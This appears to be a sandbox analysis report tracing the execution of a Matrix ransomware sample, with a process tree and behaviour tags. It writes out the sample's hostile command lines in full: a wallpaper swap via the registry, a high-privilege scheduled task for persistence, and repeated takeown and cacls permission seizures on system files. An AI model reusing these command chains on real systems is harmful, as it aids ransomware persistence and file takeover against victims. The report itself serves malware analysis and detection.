PID 5956 wrote to memory of 3132	5956	cmd.exe	108
PID 3776 wrote to memory of 3240	3776	cmd.exe	194
PID 3776 wrote to memory of 3240	3776	cmd.exe	194
PID 916 wrote to memory of 7688	916	MatrixRansomware.exe	117
PID 916 wrote to memory of 7688	916	MatrixRansomware.exe	117
PID 916 wrote to memory of 7688	916	MatrixRansomware.exe	117
PID 7688 wrote to memory of 5716	7688	cmd.exe	119
PID 7688 wrote to memory of 5716	7688	cmd.exe	119
PID 7688 wrote to memory of 5716	7688	cmd.exe	119
PID 7688 wrote to memory of 1340	7688	cmd.exe	120
PID 7688 wrote to memory of 1340	7688	cmd.exe	120
PID 7688 wrote to memory of 1340	7688	cmd.exe	120

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\MatrixRansomware.exe
"C:\Users\Admin\AppData\Local\Temp\MatrixRansomware.exe"
1⤵
- Matrix Ransomware
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:916
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\MatrixRansomware.exe" "C:\Users\Admin\AppData\Local\Temp\NWqlAD4G.exe"
  2⤵
  PID:3364
- C:\Users\Admin\AppData\Local\Temp\NWqlAD4G.exe
  "C:\Users\Admin\AppData\Local\Temp\NWqlAD4G.exe" -n
  2⤵
  - Executes dropped EXE
  PID:932
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\80DPgCP8.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1744
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\80DPgCP8.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:3940
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:7360
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:8148
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\ak974Jqe.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3164
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\ak974Jqe.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:5548
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\xhHdHGze.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      Suspicious use of WriteProcessMemory
      PID:6732
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\xhHdHGze.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5840
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5956
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:3132
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\ProgramData\USOPrivate\UpdateStore\store.db""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4176
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
    3⤵
    PID:6764
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOPrivate\UpdateStore\store.db"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:6748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "store.db" -nobanner
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5868
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "store.db" -nobanner
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:5884
    - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e64.exe
        
        SjGmrQ0e.exe -accepteula "store.db" -nobanner
        5⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:5936
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:7688
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:5716
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1340
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:4992
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:7000
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:7472
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui""
  2⤵
  PID:7144
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:5276
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:5404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:5440
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:6564
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1632
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files\Windows Photo Viewer\uk-UA\PhotoAcq.dll.mui""
  2⤵
  PID:1700
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\uk-UA\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:6940
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\uk-UA\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4868
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5928
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:6888
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2188
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db""
  2⤵
  PID:5544
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db" /E /G Admin:F /C
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2512
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db"
    3⤵
    PID:4132
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "ActivitiesCache.db" -nobanner
    3⤵
    PID:6712
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "ActivitiesCache.db" -nobanner
      4⤵
      Executes dropped EXE
      PID:5764
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5932
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui""
  2⤵
  PID:1048
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:7424
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2036
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:6412
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4916
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3696
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui""
  2⤵
  PID:4984
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2960
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:5684
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1964
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1656
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files\Windows Photo Viewer\uk-UA\PhotoViewer.dll.mui""
  2⤵
  PID:4076
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\uk-UA\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1188
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\uk-UA\PhotoViewer.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:2720
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:640
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:7020
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files (x86)\Windows Mail\wab.exe""
  2⤵
  PID:5568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\wab.exe" /E /G Admin:F /C
    3⤵
    PID:7248
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\wab.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:6504
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "wab.exe" -nobanner
    3⤵
    PID:4992
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "wab.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:6184
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:7088
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui""
  2⤵
  PID:7192
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:5380
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:5692
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:6640
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5372
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui""
  2⤵
  PID:7836
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:7376
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:6644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:3556
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:7856
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5324
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.02e9c8a2-bafa-4b16-9dcf-67968256826c.1.etl""
  2⤵
  PID:3240
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.02e9c8a2-bafa-4b16-9dcf-67968256826c.1.etl" /E /G Admin:F /C
    3⤵
    PID:7380
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.02e9c8a2-bafa-4b16-9dcf-67968256826c.1.etl"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:6272
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "MoUsoCoreWorker.02e9c8a2-bafa-4b16-9dcf-67968256826c.1.etl" -nobanner
    3⤵
    PID:4824
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "MoUsoCoreWorker.02e9c8a2-bafa-4b16-9dcf-67968256826c.1.etl" -nobanner
      4⤵
      Executes dropped EXE
      PID:7108
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:6820
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.328a7e43-e5f6-48c0-bc05-5dde7360af51.1.etl""
  2⤵
  PID:7808
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.328a7e43-e5f6-48c0-bc05-5dde7360af51.1.etl" /E /G Admin:F /C
    3⤵
    PID:7152
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.328a7e43-e5f6-48c0-bc05-5dde7360af51.1.etl"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:7100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "WuProvider.328a7e43-e5f6-48c0-bc05-5dde7360af51.1.etl" -nobanner
    3⤵
    PID:6300
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "WuProvider.328a7e43-e5f6-48c0-bc05-5dde7360af51.1.etl" -nobanner
      4⤵
      Executes dropped EXE
      PID:1008
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:7160
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files (x86)\Windows Mail\wabmig.exe""
  2⤵
  PID:7112
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\wabmig.exe" /E /G Admin:F /C
    3⤵
    PID:6372
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\wabmig.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:7384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "wabmig.exe" -nobanner
    3⤵
    PID:6356
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "wabmig.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:7328
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:7304
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui""
  2⤵
  PID:6724
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:5144
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:7544
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:7396
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4684
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files (x86)\Windows Photo Viewer\uk-UA\ImagingDevices.exe.mui""
  2⤵
  PID:6348
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\uk-UA\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:7316
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\uk-UA\ImagingDevices.exe.mui"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:6776
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:6980
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:6768
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:7232
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.02e9c8a2-bafa-4b16-9dcf-67968256826c.2.etl""
  2⤵
  PID:6180
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.02e9c8a2-bafa-4b16-9dcf-67968256826c.2.etl" /E /G Admin:F /C
    3⤵
    PID:4516
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.02e9c8a2-bafa-4b16-9dcf-67968256826c.2.etl"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1744
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "MoUsoCoreWorker.02e9c8a2-bafa-4b16-9dcf-67968256826c.2.etl" -nobanner
    3⤵
    PID:6060
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "MoUsoCoreWorker.02e9c8a2-bafa-4b16-9dcf-67968256826c.2.etl" -nobanner
      4⤵
      Executes dropped EXE
      PID:4580
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:7240
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.8c36af8e-cc9d-4849-8f3c-aecb5ba1b1d1.1.etl""
  2⤵
  PID:8004
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.8c36af8e-cc9d-4849-8f3c-aecb5ba1b1d1.1.etl" /E /G Admin:F /C
    3⤵
    PID:3492
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.8c36af8e-cc9d-4849-8f3c-aecb5ba1b1d1.1.etl"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:7796
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "WuProvider.8c36af8e-cc9d-4849-8f3c-aecb5ba1b1d1.1.etl" -nobanner
    3⤵
    PID:7988
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "WuProvider.8c36af8e-cc9d-4849-8f3c-aecb5ba1b1d1.1.etl" -nobanner
      4⤵
      Executes dropped EXE
      PID:7872
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2488
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa""
  2⤵
  PID:7488
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:5300
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa"
    3⤵
    PID:7568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "classes.jsa" -nobanner
    3⤵
    PID:7572
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:7692
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:7716
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  PID:7844
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4672
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
    3⤵
    PID:8108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:8112
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:8104
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:8036
- C:\Windows\SysWOW64\cmd.exe
